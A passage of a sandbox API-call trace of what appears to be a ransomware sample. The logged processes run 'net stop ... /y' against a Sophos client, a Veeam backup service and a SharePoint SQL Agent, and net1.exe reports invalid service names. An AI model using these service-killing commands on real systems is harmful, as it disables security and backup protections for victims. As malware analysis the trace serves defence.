lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xad [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x2e [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x7d [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x26 [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x19 [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x1b [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xbe [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x33 [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x19 [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xc1 [0204.170] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x16 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x33 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x234 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x13 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x14 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x14 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x15 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x15 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x16 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x11 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x14 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x12 [0204.171] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.171] LocalFree (hMem=0x769628) returned 0x0 [0204.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xf [0204.172] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.172] LocalFree (hMem=0x769628) returned 0x0 [0204.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x17 [0204.172] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.172] LocalFree (hMem=0x769628) returned 0x0 [0204.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x18 [0204.172] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0204.172] LocalFree (hMem=0x769628) returned 0x0 [0204.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x2a [0204.172] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0204.172] LocalFree (hMem=0x769628) returned 0x0 [0204.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x15 [0204.172] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0204.172] GetFileType (hFile=0x26c) returned 0x3 [0204.172] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x32f980 | out: lpMode=0x32f980) returned 0 [0204.172] GetConsoleOutputCP () returned 0x1b5 [0204.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0204.172] malloc (_Size=0x16) returned 0x522718 [0204.172] GetConsoleOutputCP () returned 0x1b5 [0204.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x522718, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0204.172] WriteFile (in: hFile=0x26c, lpBuffer=0x522718, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x32f984, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f984, lpOverlapped=0x0) returned 0 [0204.173] free (_Block=0x522718) [0204.173] LocalFree (hMem=0x769628) returned 0x0 [0204.173] NetApiBufferFree (Buffer=0x761c90) returned 0x0 [0204.173] NetApiBufferFree (Buffer=0x761ca8) returned 0x0 [0204.173] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS ClientΓÇ¥ /y" [0204.173] exit (_Code=1) Process: id = "212" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20fd6000" os_pid = "0xbf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamCatalogSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 385 os_tid = 0x6f8 Process: id = "213" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2281a000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "212" os_parent_pid = "0xbf0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 386 os_tid = 0x570 [0204.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f798 | out: lpSystemTimeAsFileTime=0x20f798*(dwLowDateTime=0x42f9e280, dwHighDateTime=0x1d57a87)) [0204.318] GetCurrentProcessId () returned 0xbd4 [0204.318] GetCurrentThreadId () returned 0x570 [0204.318] GetTickCount () returned 0x116cb3c [0204.318] QueryPerformanceCounter (in: lpPerformanceCount=0x20f790 | out: lpPerformanceCount=0x20f790*=32460229056) returned 1 [0204.318] GetModuleHandleA (lpModuleName=0x0) returned 0x5a0000 [0204.318] __set_app_type (_Type=0x1) [0204.318] __p__fmode () returned 0x74eb31f4 [0204.318] __p__commode () returned 0x74eb31fc [0204.318] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x5affe6) returned 0x0 [0204.318] __getmainargs (in: _Argc=0x5b9064, _Argv=0x5b906c, _Env=0x5b9068, _DoWildCard=0, _StartInfo=0x5b9024 | out: _Argc=0x5b9064, _Argv=0x5b906c, _Env=0x5b9068) returned 0 [0204.318] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.318] GetConsoleOutputCP () returned 0x1b5 [0204.319] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x5b9080 | out: lpCPInfo=0x5b9080) returned 1 [0204.319] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.322] sprintf_s (in: _DstBuf=0x20f750, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.322] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.324] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.324] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" [0204.324] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f51c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.324] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x72) returned 0x37f788 [0204.324] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.324] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f720 | out: Buffer=0x20f720*=0x381c78) returned 0x0 [0204.324] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f720 | out: Buffer=0x20f720*=0x381c90) returned 0x0 [0204.324] _fileno (_File=0x74eb2900) returned -2 [0204.324] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.324] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.324] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.324] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.324] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.324] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.324] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.324] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.325] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.325] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.325] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.325] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.325] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.325] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.325] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.325] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.325] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.325] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.325] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.325] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.325] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.325] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.325] _wcsicmp (_String1="accounts", _String2="VeeamCatalogSvc") returned -21 [0204.325] _wcsicmp (_String1="computer", _String2="VeeamCatalogSvc") returned -19 [0204.325] _wcsicmp (_String1="config", _String2="VeeamCatalogSvc") returned -19 [0204.325] _wcsicmp (_String1="continue", _String2="VeeamCatalogSvc") returned -19 [0204.325] _wcsicmp (_String1="cont", _String2="VeeamCatalogSvc") returned -19 [0204.325] _wcsicmp (_String1="file", _String2="VeeamCatalogSvc") returned -16 [0204.325] _wcsicmp (_String1="files", _String2="VeeamCatalogSvc") returned -16 [0204.325] _wcsicmp (_String1="group", _String2="VeeamCatalogSvc") returned -15 [0204.325] _wcsicmp (_String1="groups", _String2="VeeamCatalogSvc") returned -15 [0204.325] _wcsicmp (_String1="help", _String2="VeeamCatalogSvc") returned -14 [0204.325] _wcsicmp (_String1="helpmsg", _String2="VeeamCatalogSvc") returned -14 [0204.325] _wcsicmp (_String1="localgroup", _String2="VeeamCatalogSvc") returned -10 [0204.325] _wcsicmp (_String1="pause", _String2="VeeamCatalogSvc") returned -6 [0204.325] _wcsicmp (_String1="session", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="sessions", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="sess", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="share", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="start", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="stats", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="statistics", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="stop", _String2="VeeamCatalogSvc") returned -3 [0204.325] _wcsicmp (_String1="time", _String2="VeeamCatalogSvc") returned -2 [0204.325] _wcsicmp (_String1="user", _String2="VeeamCatalogSvc") returned -1 [0204.325] _wcsicmp (_String1="users", _String2="VeeamCatalogSvc") returned -1 [0204.326] _wcsicmp (_String1="msg", _String2="VeeamCatalogSvc") returned -9 [0204.326] _wcsicmp (_String1="messenger", _String2="VeeamCatalogSvc") returned -9 [0204.326] _wcsicmp (_String1="receiver", _String2="VeeamCatalogSvc") returned -4 [0204.326] _wcsicmp (_String1="rcv", _String2="VeeamCatalogSvc") returned -4 [0204.326] _wcsicmp (_String1="netpopup", _String2="VeeamCatalogSvc") returned -8 [0204.326] _wcsicmp (_String1="redirector", _String2="VeeamCatalogSvc") returned -4 [0204.326] _wcsicmp (_String1="redir", _String2="VeeamCatalogSvc") returned -4 [0204.326] _wcsicmp (_String1="rdr", _String2="VeeamCatalogSvc") returned -4 [0204.326] _wcsicmp (_String1="workstation", _String2="VeeamCatalogSvc") returned 1 [0204.326] _wcsicmp (_String1="work", _String2="VeeamCatalogSvc") returned 1 [0204.326] _wcsicmp (_String1="wksta", _String2="VeeamCatalogSvc") returned 1 [0204.326] _wcsicmp (_String1="prdr", _String2="VeeamCatalogSvc") returned -6 [0204.326] _wcsicmp (_String1="devrdr", _String2="VeeamCatalogSvc") returned -18 [0204.326] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamCatalogSvc") returned -10 [0204.326] _wcsicmp (_String1="server", _String2="VeeamCatalogSvc") returned -3 [0204.326] _wcsicmp (_String1="svr", _String2="VeeamCatalogSvc") returned -3 [0204.326] _wcsicmp (_String1="srv", _String2="VeeamCatalogSvc") returned -3 [0204.326] _wcsicmp (_String1="lanmanserver", _String2="VeeamCatalogSvc") returned -10 [0204.326] _wcsicmp (_String1="alerter", _String2="VeeamCatalogSvc") returned -21 [0204.326] _wcsicmp (_String1="netlogon", _String2="VeeamCatalogSvc") returned -8 [0204.326] _wcsupr (in: _String="VeeamCatalogSvc" | out: _String="VEEAMCATALOGSVC") returned="VEEAMCATALOGSVC" [0204.326] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x385460 [0204.329] GetServiceKeyNameW (in: hSCManager=0x385460, lpDisplayName="VEEAMCATALOGSVC", lpServiceName=0x5baaf0, lpcchBuffer=0x20f6bc | out: lpServiceName="", lpcchBuffer=0x20f6bc) returned 0 [0204.329] _wcsicmp (_String1="msg", _String2="VEEAMCATALOGSVC") returned -9 [0204.329] _wcsicmp (_String1="messenger", _String2="VEEAMCATALOGSVC") returned -9 [0204.329] _wcsicmp (_String1="receiver", _String2="VEEAMCATALOGSVC") returned -4 [0204.330] _wcsicmp (_String1="rcv", _String2="VEEAMCATALOGSVC") returned -4 [0204.330] _wcsicmp (_String1="redirector", _String2="VEEAMCATALOGSVC") returned -4 [0204.330] _wcsicmp (_String1="redir", _String2="VEEAMCATALOGSVC") returned -4 [0204.330] _wcsicmp (_String1="rdr", _String2="VEEAMCATALOGSVC") returned -4 [0204.330] _wcsicmp (_String1="workstation", _String2="VEEAMCATALOGSVC") returned 1 [0204.330] _wcsicmp (_String1="work", _String2="VEEAMCATALOGSVC") returned 1 [0204.330] _wcsicmp (_String1="wksta", _String2="VEEAMCATALOGSVC") returned 1 [0204.330] _wcsicmp (_String1="prdr", _String2="VEEAMCATALOGSVC") returned -6 [0204.330] _wcsicmp (_String1="devrdr", _String2="VEEAMCATALOGSVC") returned -18 [0204.330] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMCATALOGSVC") returned -10 [0204.330] _wcsicmp (_String1="server", _String2="VEEAMCATALOGSVC") returned -3 [0204.330] _wcsicmp (_String1="svr", _String2="VEEAMCATALOGSVC") returned -3 [0204.330] _wcsicmp (_String1="srv", _String2="VEEAMCATALOGSVC") returned -3 [0204.330] _wcsicmp (_String1="lanmanserver", _String2="VEEAMCATALOGSVC") returned -10 [0204.330] _wcsicmp (_String1="alerter", _String2="VEEAMCATALOGSVC") returned -21 [0204.330] _wcsicmp (_String1="netlogon", _String2="VEEAMCATALOGSVC") returned -8 [0204.330] NetServiceControl (in: servername=0x0, service="VEEAMCATALOGSVC", opcode=0x0, arg=0x0, bufptr=0x20f6b8 | out: bufptr=0x20f6b8) returned 0x889 [0204.331] wcscpy_s (in: _Destination=0x5ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.331] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0204.331] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5bb338, nSize=0x800, Arguments=0x5b9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0204.333] GetFileType (hFile=0x26c) returned 0x3 [0204.333] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x383f90 [0204.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x383f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0204.333] WriteFile (in: hFile=0x26c, lpBuffer=0x383f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x20f5f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f5f8, lpOverlapped=0x0) returned 0 [0204.333] LocalFree (hMem=0x383f90) returned 0x0 [0204.333] GetFileType (hFile=0x26c) returned 0x3 [0204.333] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x386238 [0204.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x386238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0204.333] WriteFile (in: hFile=0x26c, lpBuffer=0x386238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f5f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f5f8, lpOverlapped=0x0) returned 0 [0204.333] LocalFree (hMem=0x386238) returned 0x0 [0204.333] _ultow (in: _Dest=0x889, _Radix=2160168 | out: _Dest=0x889) returned="2185" [0204.333] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5bb338, nSize=0x800, Arguments=0x5b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0204.333] GetFileType (hFile=0x26c) returned 0x3 [0204.333] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x386238 [0204.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x386238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0204.333] WriteFile (in: hFile=0x26c, lpBuffer=0x386238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x20f604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f604, lpOverlapped=0x0) returned 0 [0204.333] LocalFree (hMem=0x386238) returned 0x0 [0204.333] GetFileType (hFile=0x26c) returned 0x3 [0204.333] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x386238 [0204.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x386238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0204.333] WriteFile (in: hFile=0x26c, lpBuffer=0x386238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f604, lpOverlapped=0x0) returned 0 [0204.334] LocalFree (hMem=0x386238) returned 0x0 [0204.334] NetApiBufferFree (Buffer=0x381c78) returned 0x0 [0204.334] NetApiBufferFree (Buffer=0x381c90) returned 0x0 [0204.334] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" [0204.334] exit (_Code=2) Process: id = "214" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x65cdb000" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 